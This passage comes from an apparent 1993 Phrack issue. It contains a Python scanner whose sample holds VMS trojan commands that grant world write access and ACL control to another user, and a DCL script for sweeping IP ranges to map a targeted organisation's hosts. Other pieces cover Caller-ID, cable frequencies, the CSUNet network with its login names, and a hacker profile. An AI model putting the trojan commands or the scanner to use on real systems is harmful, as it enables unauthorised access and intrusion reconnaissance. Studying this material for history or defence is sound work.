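            if pattern.search(upper):
                findings.append((number, rule_id, reason))
    return findings


# Constructed sample: a "text reader" procedure carrying the article's commands.
SAMPLE = """\
$ set noverify
$ write sys$output "Loading page 2, please wait!"
$ set def sys$login
$ set prot=(g:rwed, -
   w:rwed) *.*;*            ! split across two lines
$ assign nl:sys$output/user
$ mail set write aknight
$ set acl/acl=(ident=[aknight],access=control) *.*;*
$ set prot=(g:re,w:re) notes.txt
$ type notes.txt
"""

if __name__ == "__main__":
    for number, rule_id, reason in scan_dcl(SAMPLE):
        print(f"line {number}: {rule_id}: {reason}")
```

A procedure protected execute-only, as the article recommends to its readers, cannot be read by ordinary users, so a review like this has to run from an account that can read the file.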
Most people won't be impressed. If you're a SYSOP, fix this DAMN HOLE!!! And if you're a user well, learn the system quickly, explore, absorb, and discover some other hole before the above SYSOP patches this one......

COMMENTS, QUESTIONS, ADDITIONS, ETC can be sent to PHRACK LOOPBACK. ENJOY!!
{______________________________________________________________________________}

*****************************************************************************

                        A Internet Scanner
                           (War Dialer)
                          by MadHatter

Purpose of this program
~~~~~~~~~~~~~~~~~~~~~~~
Remember those scanner, war dialer programs everyone used to scan areas of telephone numbers to find unknown hosts? Well, now you're on the net and you're targeting some certain establishment, and you know which part of the net they own, but the hell if you know what the actual IP addresses of their hosts are... Telneting to NIC.DDN.MIL is no help, their records are a year old... Might as well have been 10 yrs ago... So you type every possible IP address in. Right? After a while that shit gets tiring... Well, hell let the computer do it, that's what it's there for. More speed, no sore fingers, no bitching, and it runs when you're not there. Almost perfect.....

Program Details
~~~~~~~~~~~~~~~
DCL is the language and it runs on Vaxen. A,B,C,D respectively represent the starting IP address. E,F,G,H respectively represent the ending IP address (ex. If you want to start at 4.1.1.1 and end at 6.1.1.1 then A = 4, B = 1, etc., E = 6, F = 1, etc.) The prog creates a data file (FINAL.DAT) that holds all successful connections. If you run it in batch, it also creates a .log file. This by far takes up most of the memory. When the program quits, delete it. This prog is just one big loop. It finds a good telnet address and then reIFINGERs there, saving it.

Program Changes
~~~~~~~~~~~~~~~
If you run it in batch, then you might (probably) have to define where the IFINGER or FINGER program is.
Make sure it is the one for FINGERing remote hosts, the commands for it vary. Why do you have to define it? Because the dumb-ass sysop couldn't think of why anyone would want to use it in batch.

Problems
~~~~~~~~
The IFINGER (FINGER) command might not connect to some hosts from your system. Why can you TELNET there but no IFINGER? It all probably has to do with the other host (it has tight security, too far away, doesn't support FINGERing, etc.).

No Solutions (Just one)
~~~~~~~~~~~~~~~~~~~~~~~
You say if I can TELNET to more places than IFINGERing, why not base the scanner on the TELNET command? Two reasons: (1) the security with the TELNET command requires its output to go to a terminal, never to run in batch; (2) the TELNET command does not give the character address (at least not on the system I use). To have the character address is valuable to me. The program lists the IP address, the character address, then whatever finger came up with.

When running in batch, the program will quit eventually (due to MAX CPU time or exceeded disk quota). This can be a pain (especially if it's CPU time), you can always get more memory. Try changing the file specifics in the prog, and run many versions of it at once, to get as much cpu time as possible. For memory, clear your account, or get more of them.

Another problem is when your program has stopped and you have nothing in FINAL.DAT file. So where do you start the batch off again? All I can say is count the number of failed connections and add 'em to your previous start address, start at that address.

More Ideas
~~~~~~~~~~
If you want the net area of an establishment then ftp to NIC.DDN.MIL and get the hosts listing, or TELNET there and search for the name.

Some areas of the net do not like to be scanned. Your sysop will get nasty calls, and then you will get nasty e-mail if you for instance scan the Army Information Systems Center. Or any other government org.
Of course, this program wouldn't hurt them at all, it would bounce back. They use firewalls. But they will bitch anyway.

After you run this program for awhile, you'll notice the net is really a big empty place. Hosts are few and far between (at least address wise). Are you agoraphobic yet? What do you do with all this room?

MadHatter

*----------------------------CUT HERE------------------------------------------*
$ A = 0
$ B = 0
$ C = 0
$ D = 0
$ E = 257
$ F = 0
$ G = 0
$ H = 0
$ D = D - 1
$ IFINGER := $VMS$UTIL:[IFINGER]FINGER.EXE;1
$ CREATE FINAL.DAT
$ LOOP1:
$ ON SEVERE_ERROR THEN GOTO SKIP
$ D = D + 1
$ IFINGER @'A'.'B'.'C'.'D'
$ ON SEVERE_ERROR THEN GOTO SKIP
$ ASSIGN TEMPFILE.DAT SYS$OUTPUT
$ WRITE SYS$OUTPUT "["'A'"."'B'"."'C'"."'D'"]"
$ IFINGER @'A'.'B'.'C'.'D'
$ DEASSIGN SYS$OUTPUT
$ APPEND TEMPFILE.DAT FINAL.DAT
$ DELETE TEMPFILE.DAT;*
$ SKIP:
$ IF A .EQ. E THEN IF B .EQ. F THEN IF C .EQ. G THEN IF D .EQ. H THEN EXIT
$ IF D .EQ. 256 THEN GOTO LOOP2
$ IF C .EQ. 256 THEN GOTO LOOP3
$ IF B .EQ. 256 THEN GOTO LOOP4
$ GOTO LOOP1
$ LOOP2:
$ D = 0
$ C = C + 1
$ GOTO LOOP1
$ LOOP3:
$ C = 0
$ B = B + 1
$ GOTO LOOP1
$ LOOP4:
$ B = 0
$ A = A + 1
$ GOTO LOOP1
$ EXIT
*------------------------------------CUT HERE----------------------------------*

*****************************************************************************

                           Caller Identification
                             by (Loq)ue & Key
                                 3/20/93

Caller-Identification (CID) is a relatively new service being offered by several carriers. It is part of a total revamp of the telephone network, with the telephone companies trying to get people to spend more money on their systems. CID is just one of the newer CLASS services, which will eventually lead into ISDN in all areas.

Caller-ID allows a receiving party to see the number that is calling before they pick up the phone. It can be used for everything from pizza delivery to stopping prank callers.
One scenario made possible from CID is one where a salesman dials your number, you look on a little box and see that it is someone you don't want to talk to, so you promptly pick up the phone, say "Sorry, I don't want any *** *** products" and slam down the receiver. Ah, the wonders of modern technology.

Caller-ID starts by a person making a call. When the person dials a number, the local switch rings the calling number once, and then sends a specially encoded packet to the number, after checking to see if that caller has access to the Calling Number Delivery service.

The packet can contain any information, but currently it holds a data stream that contains flow control, and error checking data. The specifications state that several signals can exist, however, only the Caller-ID signal is used currently.

The CID packet begins with a "Channel Seizure Signal". The CSS is 30 bytes of hex 55, binary 01010101, which is equivalent to 250 milliseconds of a 600 Hz square wave.

The second signal is the "Carrier Signal," which lasts for 150 milliseconds, and contains all binary 1's. The receiving equipment should have been "woken-up" by the previous signal and should now be waiting for the important information to come across.

Next are the "Message Type Word", and the "Message Length Word". The MTW contains a Hex $04 for CID applications, with several other codes being planned, for example $0A to mean message waiting for a pager. The MLW contains the binary equivalent of the number of digits in the calling number.

The data words come next, in ASCII, with the least significant digit first. It is padded in front with a binary 0, and followed by a binary 1. A checksum word comes after that, which contains the twos-complement sum of the MLW and data words.

The checksum word usually signals the end of the message from the CO, however, other messages for equipment to decode can occur afterwards.
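A receiver-side check of the message layout described above, as an added example that is not part of the original article: it validates the type word, length word and checksum of an already demodulated byte stream and rejects truncated or corrupted frames. The function names and the sample number are constructed; including the message type word in the checksum sum follows Bellcore's single-message format and is an assumption relative to the article, which names only the length and data words.

```python
SEIZURE_BYTE = 0x55   # channel seizure pattern 01010101, from the article
MSG_TYPE_CID = 0x04   # message type word for Caller-ID, from the article


class CIDError(ValueError):
    """Raised when a frame fails a structural or checksum test."""


def checksum(covered):
    """Two's complement of the modulo-256 sum of the covered bytes."""
    return (-sum(covered)) & 0xFF


def build_message(digits):
    """Build type + length + ASCII data + checksum (used to make test input)."""
    if not (digits.isascii() and digits.isdigit()) or len(digits) > 255:
        raise CIDError("payload must be 1-255 ASCII digits")
    data = digits.encode("ascii")
    # Assumption: the checksum covers the type word as well as length and data.
    body = bytes([MSG_TYPE_CID, len(data)]) + data
    return body + bytes([checksum(body)])


def parse_message(raw):
    """Return the ASCII data words of a valid frame, else raise CIDError.

    `raw` is the byte stream after demodulation. Leading channel-seizure
    bytes are skipped, and anything after the checksum word is ignored,
    since the article notes that further messages may follow it.
    """
    start = 0
    while start < len(raw) and raw[start] == SEIZURE_BYTE:
        start += 1
    frame = raw[start:]
    if len(frame) < 3:
        raise CIDError("truncated: no type/length/checksum words")
    msg_type, length = frame[0], frame[1]
    if msg_type != MSG_TYPE_CID:
        raise CIDError(f"unexpected message type 0x{msg_type:02X}")
    end = 2 + length
    if len(frame) < end + 1:
        raise CIDError("truncated: length word exceeds received bytes")
    body, received = frame[:end], frame[end]
    if checksum(body) != received:
        raise CIDError("checksum mismatch")
    data = body[2:]
    if not data or not all(0x30 <= b <= 0x39 for b in data):
        raise CIDError("data words are not ASCII digits")
    # The digits are returned in the order received; no reordering is applied.
    return data.decode("ascii")


if __name__ == "__main__":
    # Constructed sample: 30 seizure bytes followed by one message.
    frame = bytes([SEIZURE_BYTE]) * 30 + build_message("5551234")
    print(frame.hex(), "->", parse_message(frame))
    corrupted = bytearray(frame)
    corrupted[-3] ^= 0x01          # flip one bit in a data word
    try:
        parse_message(bytes(corrupted))
    except CIDError as exc:
        print("rejected:", exc)
```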
Caller-ID can usually be disabled with a 3 digit sequence, which can vary from CO to CO. Several of these have been mentioned in the past on Usenet, in comp.dcom.telecom.

Caller-ID chips are available from many sources, however, remember that you must connect these chips through an FCC-approved Part-68 Interface. Several of these interfaces are available, however they are fairly expensive for an amateur electronics hacker.

If you have any more questions on CID, mail me at the above address, or post to comp.dcom.telecom.

Additional Sources from Bellcore:

Nynex Catalog of Technical Information                  #NIP-7400
SPCS Customer Premises Equipment Data Interface         #TR-TSY-0030
CLASS Feature: Calling Number Delivery                  #FSD-02-1051
CLASS Feature: Calling Number Blocking                  #TR-TSY-000391

*****************************************************************************

       THE "OFFICIAL" CABLE TELEVISION VIDEO FREQUENCY SPECTRUM CHART
                COURTESY OF: JOE (WA1VIA) & JIM (WA1FTA)

CATV   CHANNEL  FREQUENCY (MHz)          CATV   CHANNEL  FREQUENCY (MHz)
-------------------------------------------------------------------------------
   2   2        55.25                      37   AA       301.25
   3   3        61.25                      38   BB       307.25
   4   4        67.25                      39   CC       313.25
   5   5        77.25                      40   DD       319.25
   6   6        83.25 (85.25 ICC)          41   EE       325.25
---------------------------------------    42   FF       331.25
   7   7        175.25                     43   GG       337.25
   8   8        181.25                     44   HH       343.25
   9   9        187.25                     45   II       349.25
  10   10       193.25                     46   JJ       355.25
  11   11       199.25                     47   KK       361.25
  12   12       205.25                     48   LL       367.25
  13   13       211.25                     49   MM       373.25
---------------------------------------    50   NN       379.25
  14   A        121.25                     51   OO       385.25
  15   B        127.25                     52   PP       391.25
  16   C        133.25                     53   QQ       397.25
  17   D        139.25                     54   RR       403.25
  18   E        145.25                     55   SS       409.25
  19   F        151.25                     56   TT       415.25
  20   G        157.25                     57   UU       421.25
  21   H        163.25                     58   VV       427.25
  22   I        169.25                     59   WW       433.25
----------------------------------------   60   W+       439.25
  23   J        217.25                   ---------------------------------
  24   K        223.25                     61   W+1      445.25
  25   L        229.25                     62   W+2      451.25
  26   M        235.25                     63   W+3      457.25
  27   N        241.25                     64   W+4      463.25
  28   O        247.25                     65   W+5      469.25
  29   P        253.25                   ---------------------------------
  30   Q        259.25                     66   A-1      115.25
  31   R        265.25                     67   A-2      109.25
  32   S        271.25                     68   A-3      103.25
  33   T        277.25                     69   A-4      97.25
  34   U        283.25                     70   A-5      91.25
  35   V        289.25                   ---------------------------------
  36   W        295.25                     01   A-8      73.25
-------------------------------------------------------------------------------
* This chart was created 08/19/89 by: WA1VIA & WA1FTA. Some uses include the isolation of CATV interference to other radio services, and building of active & passive filters, and descramblers. This does NOT give you the right to view or decode premium cable channels without proper authorization from your local cable TV company. Federal and various state laws provide for substantial civil and criminal penalties for unauthorized use.
-------------------------------------------------------------------------------

******************************************************************************

                        -----------------------------
                           The CSUNet X.25 Network
                            Overview by Belgorath
                        -----------------------------
                            C y b e r C o r p s

Calstate University, along with Humboldt State, runs a small X.25 network interconnecting its campuses. This file will attempt to give an overview of this network. The hosts on this network are connected via 9600-baud links. The main PAD on this network is a PCI/01 that allows the user to connect to several hosts. Among them are:

(At the time of this writing, several of the machines were unreachable. They are marked with "No info available")

hum  - Humboldt State University CDC Cyber 180-830 (NOS 2.7.1)
swrl - A CalState CDC Cyber named "Swirl", running CDCNet. You may use CDCNet to connect to the following hosts:
         ATL   (SunOS, eis.calstate.edu), login as:
                 access  to request an account
                 ctp     to access CTP
         CCS   CDC Cyber 960-31 (NOS 2.7.1) - This is Swirl without CDCNet
         COC   CDC Cyber 960-31 (NOS 2.7.1)
         FILLY VAX 6230 (VMS 5.3)
         ICEP  IBM 4381 (VM)
         OX    IBM 4381 (MVS) (Aptly Named)
mlvl - University of California's Library Catalog System, named "Melvyl".
sb   - Calstate/San Bernardino CDC Cyber 180-830 (NOS 2.5.2)
sd   - San Diego State University CDC Cyber 180-830B (NOS 2.7.1)
chi  - Calstate/Chico CDC Cyber 180-830 (NOS 2.7.1) - oddly enough this system is running CDCNet with itself as the only host
bak  - Calstate/Bakersfield CDC Cyber Dual 830 CMR-1 (NOS 2.7.1) this system is running CDCNet, and if you fail the login, you can connect to these systems, if you type fast enough:
         CCS      - Central Cyber 960 System
         CSBINA   - CSUB Instructional Vax 3900
         CSBOAA   - CSUB Office Automation Vax 4300
         CYBER    - Local host
         RBFBATCH - CSUB CDC Cyber Remote Batch Gateway
ccs  - CDC Cyber 960-31 (CCS from Swirl)
coc  - CDC Cyber 960-31 (COC from Swirl)
dh   - Calstate/Dominguez Hills CDC Cyber 960-11 (NOS 2.7.1) - this system runs CDCNet with no hosts.. go figure
fre  - Calstate/Fresno - No info available
ful  - Calstate/Fullerton - No info available
hay  - Calstate/Hayward - No info available
la   - Calstate/Los Angeles - No info available
lb   - Calstate/Long Beach - No info available
mv   - No info available
news - No info available
nor  - Calstate/Northridge - No info available
pom  - California State Polytechnic University, Pomona - No info available
sac  - Calstate/Sacramento CDC Cyber 180-830 (NOS 2.5.2)
sf   - Calstate/San Francisco - No info available
sj   - San Jose State University - No info available
son  - Sonoma State University CDC Cyber 180-830 (NOS 2.7.1) - this system runs CDCNet with itself as the only host
sm   - No info available
slo  - California State Polytechnic University, San Luis Obispo - No info available
sta  - Calstate/Stanislaus - No info available
ven  - No info available
carl - No info available
caps - CSUNet networking machine. From it, you can connect to most PAD hosts plus a few more.
       The extras are:
         access    - Connect to eis.calstate.edu (login as "access")
         core      - Connect to eis.calstate.edu (login as "core")
         ctp       - Connect to eis.calstate.edu (login as "ctp")
         eis       - Connect to eis.calstate.edu (login as "eis")
         trie      - Connect to eis.calstate.edu (login as "trie")
         csupernet - CSUPERNet appears to be a public-access UNIX.
                     login as "public" for ATI-Net.
                     login as "super" for academic information.
                     login as "atls" for the ATLS system
                     Once you apply for an account here, you can telnet to caticsuf.cati.csufresno.edu to use it.

This is all well and good, but how do you access CSUNet? It can be reached via Internet, using the Humboldt PACX (pacx.humboldt.edu). The Humboldt PACX allows several services, among them are:

X25    - Connect directly to CSUNet PAD
960    - CDC Cyber 180/830 (Swirl)
830    - CDC Cyber 180/830 (COC from Swirl)
VAX    - VAX 8700 (VMS V5.3)
70     - DEC PDP 11/70 (running RSTS)
SEQ    - Sequent S81 (running Dynix V3.1.4 X.25 UNIX software)
TELNET - Telnet Server

That's really all there is to say concerning the network structure (well, I could go through and list all their X.25 addresses, but I won't). There's a ton more to be said about using this network, but its little quirks and surprises can be left to you to figure out. What I can do here is give a few hints on using CDCNet and the PAD.

Using the PAD
~~~~~~~~~~~~~
Once you're at the X.25 PAD, you'll get a message like:

CSUnet Humboldt PCI/01, Port: P17

At the "Pad>" prompt, simply type the hostname to connect to. When in doubt, type "help ", or just "help" for a list of subjects that help is available on.

Using CDCNet
~~~~~~~~~~~~
When a CDC Cyber says "You may now execute CDCNet Commands", this is your cue.
You have the following commands available:

    activate_auto_recognition
    activate_x_personal_computer
    change_connection_attribute
    change_terminal_attribute
    change_working_connection
    create_connection
    delete_connection
    display_command_information
    display_command_list
    display_connection
    display_connection_attribute
    display_service
    display_terminal_attribute
    do
    help
    request_network_operator

The ones to concern yourself with are display_service, create_connection, and help. "help" gives the above command listing (useful), "display_service" lists the hosts on the current CDCNet, and "create_connection " creates a connection to "host" on the CDCNet.

*******************************************************************************

                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 6 of 27

                           -:[ Phrack Prophile ]:-

This issue our prophile features a hacker who has been around forever, who's been there and done that, literally. His handle is Dr. Who. When almost everyone was still mystified by Telenet, Dr. Who was busily exploring Europe's PSN's like PSS and Datex-P. When the Internet was in its infancy, Dr. Who was there with an account on BBN. When the world was short of NUI's, Dr. Who discovered and perfected Pad-To-Pad. When the world still thought COSMOS was the end-all-be-all, Dr. Who was lurking on 1A's. One of the early LODers and one of the longest lasting. And to top it all off, a close personal friend. How elite can you get?
______________________________________________________________________________

Personal Info:

         Handle: Doctor Who (aka Skinny Puppy and Saint Cloud)
       Call him: Bob
  Date of Birth: February 5, 1967
            Age: 26
         Height: 6'1"
         Weight: 160 lbs
Computers owned: in chronological order: Apple ][ series, Sinclair ZX81, Commodore TRS-80 models 4 and 16, Coco, Atari 512, Toshiba 2000sx. I am probably leaving out some.

How did you get your handle?
From the TV show, of course - I had a hard time defending it from other people, so would sometimes add (413), my home area code, to identify which one I was. Skinny Puppy was from the band of course, and Saint Cloud was from the location of a system I was playing with, in France.

How did you get started?

As a kid, I was a radio & electronics junkie. In 6th grade I wanted one of those $99 "computer kits" you would see in the back of "Popular Electronics" magazine, which had a hex keypad, and seven-segment LED display, had 1K of ram, etc...But lusted after the TRS-80 model-I when I used it at Radio Shack. I finally got a computer in 1981 when I was in 9th grade. I asked my parents for a Commodore, but they went all out and got an Apple ][+. I took to programming instantly, and within a few months had a reputation as the best programmer in my school.

In a 1982 "Popular Communications" magazine article, I discovered the world of loops and test tones and started playing with those. I later tried to make free phone calls by using a tape recorder as a red box but failed, looking back probably due to inadequate volume. The seeds had been planted.

I wanted all sorts of software, but I had no money, and my parents wouldn't buy very much. One computer-club meeting, someone brought in about 15 disks of pirated software, and I had a chance to copy about 4 disks. The guy told me about pirate BBSs, and people trading software. In a few of the games I copied, there were numbers to different BBSes, and when I was at a friend's house on Cape Cod in the summer of 1983, we used his 300 baud acoustic modem to call them. I remember calling Pirate's Harbor in Boston, and I think we called Pirate-80. I wanted a modem badly, but they were too expensive. I convinced a friend to split the cost with me, and on January 2, 1984 my networker modem arrived. That month, in the process of getting warez I ran up over $150 in phone bills as there were no local boards.
I was becoming obsessed with being on the modem, and on the computer in general. I was never a good student, and my parents and teachers found a way, they thought, to entice me to do my homework - hold computer usage over my head. But this just succeeded in making me sneak access when no one was looking - during lunch at school, or when my parents went shopping at home. Soon they locked the computer room (the den, really) when they left, but I used a ladder to get in to the second story window until I had a copy of the key. To this day I think if they let me indulge myself in my interest, I would have become a much more normal computer geek, and done better in school.

Anyhow, I started learning about codez to appease the huge phone bills, and started to learn more about phones & how they worked. The pirating fell by the wayside as I became more involved with phreak/hack boards. I was fascinated by communications (I always had been) and phreaking/hacking opened up new frontiers. My inhibitions in breaking the law melted away because it interfered with my enjoyment of knowledge - had there been opportunities to pursue this avocation without breaking the law, I probably would have done so. A hacker was born.

What are your interests?

Women: Tall, thin, brainy, blue eyes. It seems as though I attract all the psychos. Right now, I am FREE of any relationships and haven't decided whether I am enjoying it or not.

Cars: Cars are the greatest things. I love them. Art, Machine & House - The only possession I have that encloses me. I got my license later than most people, and have learned to enjoy the freedom wheels bring, especially for someone who lives in a rural area. Right now, I own two cars, one running (barely) and entirely generic, the other one very unique, beautiful, and broken. The story of my life!

Food: I hate fish & chicken, love hot food. Not a vegetarian in the least. But don't eat much, I am too busy. I survive on Coffee.
Music: I have been 'alternative' for a while now, kind of Gothic, sometimes I dress that way, sometimes I don't. Favorite bands: Joy Division, Skinny Puppy, old Cure, but I have been starting to like Techno more and also Classical. Go figure.

Favorite authors: Ayn Rand, Anne Rice, Robert Anton Wilson, George Orwell, Douglas Adams, J.G. Ballard

Favorite Book: Atlas Shrugged

Favorite Movies: Brazil, 1984, The Holy Grail, Heathers, Blade Runner, Max Headroom, Slacker, Subway, Drowning by Numbers, Dune

Favorite TV: Doctor Who (of course), The Avengers, Miami Vice, Hawaii Five-O

What am I?

A slacker, a hacker, a writer, a romantic, a twenty-nothing, a lost poet, a New Englander, an American in the truest sense of the word, a girl-chaser, a connoisseur of cheap champagne & expensive beer, a dilettante, a smoker of cloves, caffeine addict, an atheist, a discordian, a libertarian of sorts, a cynic, a procrastinator, a conversationalist, a fast driver, an oldest child, a criminal, a watcher of fire & water, a lover of love, a believer in the unpure, a trekkie, a whovian, an anglophile, still an undergraduate, jealous, mischievous, a perfectionist, a believer in the essential good in mankind, and probably a mortal.

What are some of your most memorable experiences?

The worst day of my life - 3/11/86 - getting busted, and not knowing what for. My parents called up my high-school and left a message for me to call home immediately. When I did, they informed me that the Secret Service and TRW (Hi Mr. Braum) had been in our house and removed everything. A nosy neighbor saw the whole incident, and within days our entire town knew about the raid. Some three and a half years later they pressed charges. So much for due process and right to a speedy trial.

Good days: 5-91 - Being all fucked up in NYC with my girlfriend and Bill from RNOC; 10/9/84 - My first TAP meeting. Expecting to meet Mark Tabas but meeting his father instead.
Tabas had run away from home, and his parents found some notes indicating that he might turn up in New York at Eddie's for the TAP meeting. Tabas' dad hopped on a plane to NYC, rented a car and staked out the meeting. Everyone inside, already convinced that they were under surveillance, became very aware that they were being watched by some guy in a suit and a rental car. Eventually, he came inside and asked if anyone knew where Tabas was. We said "Who wants to know?" To which he gave out his business card letting us know he was Tabas' dad and just worried. Tabas was not even in New York.

The whole summer of 1985 - staying at home, hacking and loving being a computer geek.

Four days straight on an Alliance Teleconference once, being woken up each morning by blasts of touch-tone!

Philadelphia Cons, back in 86.

West 57th St. - a few seconds towards my 15 minutes of fame.

KP+914-042-1050+ST Discovering Pad-to-Pad.

McD: Becoming an XRAY Technician. (Dr. Bubbnet)

MSK ../tdas NET-LINE-20245614140000.

Wallpapering my room with Sprint Foncard printouts

Most of the rest of my most memorable experiences are in my love life, which is none of your business!

Some People (and/or BBSes) To Mention:

My favorite BBS of all time was Farmers of Doom. Also memorable were The Legion of Doom, Osuny, WOPR, Black Ice, and lots more. My favorite boards were the ones where there was a lot of activity, and a lot of trust between the users. While a board that doesn't crash all the time is important, an expensive computer does not a good board create.

There are a lot of people who I would like to mention that have helped me greatly and who I have known for a very long time:

Lex Luthor - Just because you're paranoid doesn't mean people AREN'T out to get you.
Mark Tabas - He really does look like Tom Petty.
Bill from RNOC - Should sell used cars.
RC Modeler - I hold you wholly responsible for the Clashmaster incident :)
Tuc - Well, he's just Tuc. What else can you say?
X-Man - Is he an FBI agent yet?
Karl Marx - Only person I know with his own dictionary entry. Next: the social register.
Mr. Bigchip - Who is that? (I'm sure you are all asking)
The Videosmith - (see entry for Luthor, L.)
Parmaster - Should have followed Lex's advice.
Kerrang Kahn - His accent is finally gone.
Terminal Man - So long and thanks for all the codes. (This man knew The Condor?)
The Marauder - Has taken up permanent residence on IRC.
Shatter, Pad, Gandalf - PSS Junkies. What those guys wouldn't do for an NUI.
New York - Don't Mess With Texas
Everyone Else - Sorry I couldn't think of anything clever to say.

One I would like to single out is Erik Bloodaxe, who I have known over the phone for 9 years now, but will meet for the first time at this year's Summercon, if I get there. [Ed: He didn't make it]

Also: for you hackers that have disappeared from my life, you who had my number, my parents' number has never changed, you can contact me through them if you like, I would love to hear from you.

How do you see the future of the Underground?

It's not going to go away. There will always be new challenges. There are always new toys for curious minds. There may be a split into several different, only partially interlocking 'undergrounds' involving different types of technological playing. In spite of Caller-ID and advanced security functions of the new digital switches, there will still be many ways to phreak around the phone system: taking advantage of the old Crossbars in remote areas, and by finding some of the 'pheatures' in new switches. Hacking on the Internet will always be around despite who controls the net, though I am sure there would be a lot more destructive hacking if the mega-corporations take it over. Security of systems is more a social problem than a technological one, there is always a segment of the population that is gullible, stupid, or corrupt. There will always be some smartass out there making trouble for the Organization.
Constantly evolving systems and brand new systems will present security holes forever, though they may be harder to understand as the systems grow more complex. With more computers networked there will be a lot more to play with. Socially, I am worried about the huge wars that have developed, LOD v. MOD, etc. While hackers have always been contentious, as well they should be, the ferocity of attacks has me somewhat stunned. I will leave out blames and suggestions here, but I will just make the observation that as any community grows large in size, the intimacy that it enjoys will be diminished. When the underground was small, isolated, and revered as black magicians by outsiders, it was as though we were all part of some guild. Now that there are many more people who have knowledge of, and access to, the hacker community, there is little cohesiveness. I see this getting worse. The solution may be tighter knit groups. But an outbreak of wars between mega-gangs could be a real catastrophe. The cyberpunk aesthetic seems to have captivated the underground. Some people have to be aware that the community was here before William Gibson was patron saint, and that most of us still can't successfully "rustle credit" - which means this is a hobby, not a profession. Will this change? Slowly, I imagine. The trendies will get tired and find something else to pretend to be, (maybe dinosaurs, given the current popularity of Jurassic Park), and only the hard-core hackers will be left. Some of us may, in time, turn into computer criminals, to which I am indifferent, as it won't be me. The current cyber-hysteria has attracted a whole bunch of trendy fakes, and is distracting us from what originally brought us, most of us anyway, to hacking/phreaking in the first place - the insatiable curiosity, the dance of the mind unbounded. Will the hype die? Time will tell. 
Sometimes I get so sick of the crap I see on IRC that I wish someone would give me back an apple IIe and an applecat 212, and set me back down in 1984. Just call me over the hill.

Any end comments?

Hacking is the art of esoteric quests, of priceless and worthless secrets. Odd bits of raw data from smashed machinery of intelligence and slavery reassembled in a mosaic both hilarious in its absurdity and frightening in its power.

-----------=?> Doctor Who

Stuart Hauser from SRI, Stanford Research Inst. was the first speaker of the day, he was (or is) an older looking man who looked relaxed and confident. He was here to tell us about SRI and their goals (or he was here to milk the crowd for info, depends who you talk to I suppose). SRI is an international corporation, employing over 3000 people, that claims no ties to the Feds, NSA, CIA or any other government arm interested in harming, persecuting or even prosecuting the hacker community. Their main concern is major network security, on a corporate level. However there was talk of SRI having contract work for military related arms producers this was not brought up at the conference.

He started by talking about himself and SRI, he mentioned their policy and their feelings towards dealing with the hacker community on a productive level. He went on to confirm, that someone we all know or know of that works for the same company is an asshole, and we are not the only community to realize this. I will leave his name out for reasons of privacy, however a good hint for those who were not at scon and are reading this his first name starts with DON.

After allowing us all to laugh this over he went to tell us of the finding of his team's research from SRI. His team consisted of himself, Doug Web, and Mudhead, they were tasked to compile a report on the computer underground in some nebulous fashion, he was of course (at least to me and everyone I was sitting with) not very clear with this.
To the best of our knowledge the report was like a damage potential report, ie: How much can the hackers really do, and HOW much will the hackers do? Stu conceded that the networks and companies had more to fear from corporate espionage at the hands of employees and mismanagement than they did from hackers. However he fears a new breed of hackers he says are becoming a reality on the nets, the hacker for cash, digital criminals. He felt that this new breed of hacker will be counterproductive for both the PD world and the underground on the basis that if they destroy it for the corps, we cannot use it either.

In the way of security Stuart felt the Social engineering was the biggest weakness of any system, and the most difficult to defend against. Also he felt too much info about machines and security of them was public info, also public info was available for use in social engineering. He felt that the only way to combat this is to make the employees and owners of companies more aware of these threats. Beyond the social engineering he feels that physical measures are too weak at most facilities and do not protect their hardcopy data well enough he meant this both for Trashing and actual b&e situations again he felt the situation was to spread awareness.

While conducting the interviews for this report Stuart formed his own opinion of the hacker which he shared with us. He feels that hackers for the most part are not malicious at all, and are actually decent members of cyberspace. Moreover he feels that hackers should be put to work as opposed to put to jail. Something we all feel strongly about.

Stuart finished his speech with brief allusions to scholarships and upcoming programs, at this point he left the floor open to questions. They are as follows:

Emmanuel Goldstein: "Earlier you (Stuart) mentioned the existence of 'malicious hackers', where are they?"

Stu: "Holland, Scandinavia, the UK poses a great threat, Israel, Australia.
The bloc countries for virii and piracy are very busy right now, We have to wonder what will happen when they get full access to our nets. What happens when the eastern bloc catches up?"

Unknown: "Who finances this".

Stuart: "Really that's none of your business" (paraphrased)

Unknown: "Where is the evidence of these so called malicious hackers, I think the whole malicious hacker idea is spawned by the media to justify the persecution of hackers".

Stuart: [Has no chance to reply]

Control-C: (interjects) "Punk kids are all over the place doing it man."

KL: "it's common knowledge that it is happening there."

Stu: (offers example) Was told that at three companies have tried to hire tiger teams, for corporate breaches however he has no proof of this. Yet he feels the sources were reliable.

Unknown: "I have heard rumors that SRI is writing software to catch hackers. Is this true?"

Stu: Says he hasn't heard about this. However if they are more interested in what SRI is doing he will be sticking around until this afternoon or evening. And has about 15 copies of the report that are available to the public.

Next speaker

[I was out of the room for this speaker and asked Black Kat to type this in, so your guess is as good as mine.]

Someone showed a DES encryption laptop, 8 months old, with a built in chip to encrypt everything in and out (modem, disk, etc). Didn't have an overhead projector but was giving personal demos. Made by BCC (Beaver Computing Company) out of California. Doesn't advertise, but will give sales brochures etc, if you call the 800 number. Thinks the govt is discouraging wide scale distribution.

Count Zero & RDT

Count Zero announced he would be talking on a unique telco feature they found and about packet radio. Stickers and board ads from RDT and cDc were handed out at this time. White Knight and Count0 started by introducing a bizarre telco feature they came across, and played a tape recording to demonstrate some of its features to the crowd.
After some chatter with the rest of the con, nothing definite was concluded, however, some good ideas are brought out. (As well as some insight by folks who have discovered similar systems.)

Next came some comic relief from Count0 and White Knight in the way of the termination papers of an employee from a telco, the employee's case report was read to the crowd and essentially painted the picture of a really disgruntled and ornery operator. Specifics were read, and people laughed at the shit this guy had gotten away with, end of story.

Following this Count0 spoke for Brian Oblivion who could not be there about an American Database/social program called America 2000. Brian came across this information by the way of a group in Penn state, the program is meant to monitor the attitudes of students, and how they behave within state standards. Furthermore the Database is compiled without the knowledge or permission of parents, beyond this the file can stay with a man or woman for life, in the hands of the state.

Count0 on Packet Radio Self-empowering Technology

Next came the actual Packet radio discussion, Count0 displayed his hardware and talked at great length on a whole spectrum of issues related to the radio packet switching, and some points while straying, even the morality of the FCC. This went on for quite some time. Count0 instructed the crowd on the principle behind packet switch radio as well as explaining which licenses to get and to apply.

Drunkfux, Merchandising Drunkfux

